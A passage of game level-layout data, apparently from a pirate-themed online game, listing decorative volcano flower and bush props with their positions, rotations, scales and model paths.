'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(301.517, -113.656, 23.539),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618148.25akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(391.527, -82.915, 14.089),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618152.58akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(430.246, -97.02, 13.697),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618160.56akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(163.411, -167.406, 52.9),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618161.94akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(179.079, -191.369, 55.86),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618162.89akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(180.599, -185.884, 54.821),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618166.17akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(179.257, -95.658, 45.624),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618168.47akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(93.916, -118.768, 61.692),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': 
{'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618170.27akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(67.107, -121.587, 74.129),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618172.11akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(21.069, -161.323, 90.783),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618174.14akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-11.657, -113.657, 92.671),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618184.98akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-71.661, -140.067, 98.219),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618189.66akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-125.457, -131.031, 104.443),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618196.23akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-76.589, -199.071, 109.79),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618197.2akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-76.114, -192.975, 109.369),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618204.44akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': 
Point3(-139.775, -273.067, 108.228),'Scale': VBase3(1.651, 1.651, 1.651),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618210.45akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-241.971, -287.025, 115.344),'Scale': VBase3(0.876, 0.876, 0.876),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618216.23akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-270.782, -272.781, 117.825),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618220.91akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-359.19, -226.785, 113.594),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618225.2akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-364.677, -329.996, 119.873),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618227.19akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-124.379, 0.0, 0.0),'Pos': Point3(-315.138, -334.297, 127.726),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618231.33akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-337.154, -163.298, 106.66),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618234.95akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-198.133, -135.398, 106.504),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 
'models/props/pir_m_prp_vol_flower_white_b'}},'1273618242.08akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-98.066, 0.0, 0.0),'Pos': Point3(-178.186, -70.115, 107.825),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618244.13akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-157.994, -23.45, 104.68),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618251.0akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-222.912, 18.578, 79.072),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618255.25akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-262.118, 54.123, 64.293),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618257.72akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-220.824, 136.707, 64.898),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618260.41akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-299.883, 203.213, 62.246),'Scale': VBase3(1.406, 1.406, 1.406),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618266.59akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-137.365, 0.0, 0.0),'Pos': Point3(-465.91, 46.349, 73.462),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618268.58akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': 
Point3(-443.778, -2.166, 73.013),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618269.8akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-487.157, 63.553, 73.984),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618272.11akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-446.923, 89.485, 70.813),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618274.47akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-418.059, 52.258, 71.805),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618275.38akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-406.676, 34.317, 72.623),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618280.56akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-362.959, 30.092, 69.098),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618282.16akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-348.783, 52.996, 66.092),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618285.48akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-461.88, -18.053, 72.019),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618287.94akelts': {'Type': 
'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-510.723, 33.704, 76.281),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618292.2akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-535.67, 94.955, 73.444),'Scale': VBase3(1.243, 1.243, 1.243),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618295.22akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-602.515, 92.605, 71.666),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618296.3akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-657.339, 61.309, 66.221),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618297.13akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-663.053, 64.069, 66.56),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618300.47akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-676.998, 169.085, 57.762),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618302.67akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-29.887, 7.421, 0.0),'Pos': Point3(-666.55, 184.103, 61.385),'Scale': VBase3(2.944, 2.944, 2.944),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618303.83akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-641.321, 202.811, 65.905),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 
'','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618305.7akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-552.123, 198.699, 67.267),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618307.13akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-513.909, 202.059, 66.968),'Scale': VBase3(1.256, 1.256, 1.256),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618327.0akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(0.0, 0.0, 4.488),'Pos': Point3(-523.347, 326.533, 57.327),'Scale': VBase3(1.48, 1.48, 1.48),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618327.88akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-543.492, 324.867, 59.232),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618331.58akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(116.809, 0.0, 0.0),'Pos': Point3(-561.178, 386.724, 49.208),'Scale': VBase3(2.064, 2.064, 2.064),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618334.78akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-520.351, 446.496, 36.537),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618337.86akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': 
Point3(-497.715, 459.779, 38.215),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618340.31akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-477.735, 354.954, 52.101),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618341.11akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(58.95, 0.0, 6.204),'Pos': Point3(-443.822, 353.858, 49.87),'Scale': VBase3(2.217, 2.217, 2.217),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618343.48akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-360.542, 398.487, 45.291),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618347.52akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-329.065, 372.58, 46.943),'Scale': VBase3(1.514, 1.514, 1.514),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618349.61akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(9.723, 0.0, 0.0),'Pos': Point3(-330.041, 415.985, 44.301),'Scale': VBase3(1.443, 1.443, 1.443),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618365.23akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-218.137, 493.894, 47.945),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 
'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618369.14akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-331.378, 482.608, 37.645),'Scale': VBase3(1.831, 1.831, 1.831),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_b'}},'1273618372.66akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-160.895, 573.245, 26.374),'Scale': VBase3(1.265, 1.265, 1.265),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273618376.08akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-294.927, 651.972, 16.223),'Scale': VBase3(1.999, 1.999, 1.999),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618377.05akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-257.499, 672.428, 14.157),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618378.0akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-236.383, 690.466, 11.115),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618381.27akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(-160.538, 0.0, 0.0),'Pos': Point3(-192.024, 565.858, 26.658),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618383.83akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 
65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-23.181, 562.394, 19.609),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618386.52akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(15.057, 0.0, 0.0),'Pos': Point3(29.384, 531.81, 17.45),'Scale': VBase3(2.627, 2.627, 2.627),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_c'}},'1273618387.81akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-52.525, 515.323, 25.541),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618392.2akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(103.706, 596.441, 17.132),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618393.28akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(143.132, 611.951, 17.32),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618395.11akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(177.778, 603.653, 17.694),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618396.98akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(321.009, 685.127, 19.415),'Scale': VBase3(1.541, 1.541, 1.541),'VisSize': '','Visual': {'Model': 
'models/props/pir_m_prp_vol_flower_white_b'}},'1273618397.95akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(326.312, 688.396, 15.912),'Scale': VBase3(1.392, 1.392, 1.392),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618398.98akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(283.054, 671.349, 17.998),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273618402.16akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(-26.774, 0.0, 0.0),'Pos': Point3(239.133, 597.734, 25.138),'Scale': VBase3(1.47, 1.47, 1.47),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618403.91akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(215.944, 579.828, 25.295),'Scale': VBase3(1.466, 1.466, 1.466),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273618444.13akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(422.945, -98.913, 14.587),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618513.06akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(135.455, -199.702, 58.394),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618514.72akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(180.71, -179.011, 52.939),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 
'','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_a'}},'1273618686.73akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-311.185, -333.025, 127.66),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273618693.25akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(123.797, 0.0, 0.0),'Pos': Point3(-307.019, -333.72, 127.593),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273618761.7akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-203.709, -137.977, 106.756),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618905.52akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-364.133, 43.128, 67.953),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273618979.11akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(17.057, 0.0, 0.0),'Pos': Point3(-476.986, 46.571, 74.525),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_b'}},'1273619007.45akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-137.365, 0.0, 0.0),'Pos': Point3(-449.255, 48.677, 72.608),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_a'}},'1273619047.55akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-441.128, -6.623, 73.007),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273619102.73akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': 
VBase3(-137.365, 0.0, 0.0),'Pos': Point3(-451.52, 29.021, 72.721),'Scale': VBase3(1.852, 1.852, 1.852),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273619126.22akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-444.282, 9.556, 72.858),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_yel_b'}},'1273619158.52akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(-103.532, 0.0, 0.0),'Pos': Point3(-415.852, 70.815, 71.198),'Scale': VBase3(1.765, 1.765, 1.765),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273619346.64akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-825.368, 156.938, 43.081),'Holiday': '','Hpr': VBase3(80.179, 0.0, 0.0),'Pos': Point3(-810.125, 136.299, 43.081),'Scale': VBase3(1.946, 1.946, 1.741),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_c'}},'1273620157.05akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(237.056, 579.661, 25.17),'Scale': VBase3(1.112, 1.112, 1.112),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_bush_a'}},'1273620315.03akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-30.521, 0.0, 0.0),'Pos': Point3(-391.934, 44.303, 71.541),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 